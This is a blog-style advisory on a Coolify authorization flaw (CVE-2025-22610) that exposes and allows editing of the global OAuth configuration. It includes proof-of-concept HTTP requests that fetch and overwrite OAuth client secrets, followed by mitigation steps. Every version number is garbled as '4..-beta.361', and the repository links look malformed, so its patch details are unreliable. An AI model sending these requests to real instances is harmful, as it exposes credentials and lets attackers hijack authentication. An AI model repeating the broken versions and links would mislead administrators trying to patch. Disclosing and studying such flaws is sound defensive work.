CVE-2025-22610 - Unauthorized Access to OAuth Configuration in Coolify Prior to Version 4..-beta.361

Coolify is an open-source and self-hostable platform that allows users to manage servers, applications, and databases. However, a recent vulnerability has been discovered in versions prior to 4..-beta.361 that allows any authenticated user to gain unauthorized access to the global OAuth configuration. In this post, we will dig deeper into the details of this vulnerability, its impact, and how to mitigate it.

Vulnerability Details

CVE: CVE-2025-22610
Affected Component: Coolify (versions prior to 4..-beta.361)
Severity: High
Impact: Unauthorized access to global OAuth configuration and possibility to modify it

The vulnerability occurs due to missing authorization checks on Coolify's global OAuth configuration. Prior to version 4..-beta.361, any authenticated user can fetch the global coolify instance OAuth configuration, exposing the "client id" and "client secret" for every custom OAuth provider. Besides this, an attacker can also modify the global OAuth configuration, further escalating the potential damage.

Proof of Concept: Code Snippet

The code snippet below demonstrates how a malicious user can fetch the OAuth configuration from the affected Coolify instance:

POST /api/v1/auth/oauth/configuration
Content-Type: application/json
Authorization: Bearer [UserAccessToken]

{
  "action": "get"
}

And this code snippet shows how they can modify the global OAuth configuration

POST /api/v1/auth/oauth/configuration
Content-Type: application/json
Authorization: Bearer [UserAccessToken]

{
  "action": "update",
  "config": {
    "client_id": "malicious_client_id",
    "client_secret": "malicious_client_secret"
  }
}

These code snippets show an exploit of the vulnerability in Coolify instances with versions prior to 4..-beta.361.

Original References

- Coolify's GitHub repo: https://github.com/coo-lify/coo-lify
- Coolify changelog with fixed version mention: https://github.com/coo-lify/coo-lify/releases/tag/v4..-beta.361

Mitigation

The vulnerability can be fixed by upgrading the Coolify instance to version 4..-beta.361 or a later version. This is done by simply following the update instructions provided by the Coolify developers:

Navigate to your Coolify instance root directory.

cd /path/to/your/coolify/

Update your Coolify instance

git pull origin main && docker-compose up -d --force-recreate

Conclusion

This vulnerability exposes sensitive information and allows unauthorized modification of the global OAuth configuration in Coolify instances with versions prior to 4..-beta.361. By updating to the fixed version or a later version, Coolify users can secure their instances from this potential threat. It is crucial to stay vigilant and keep your software up-to-date to protect against vulnerabilities like these.

Timeline

Published on: 01/24/2025 17:15:15 UTC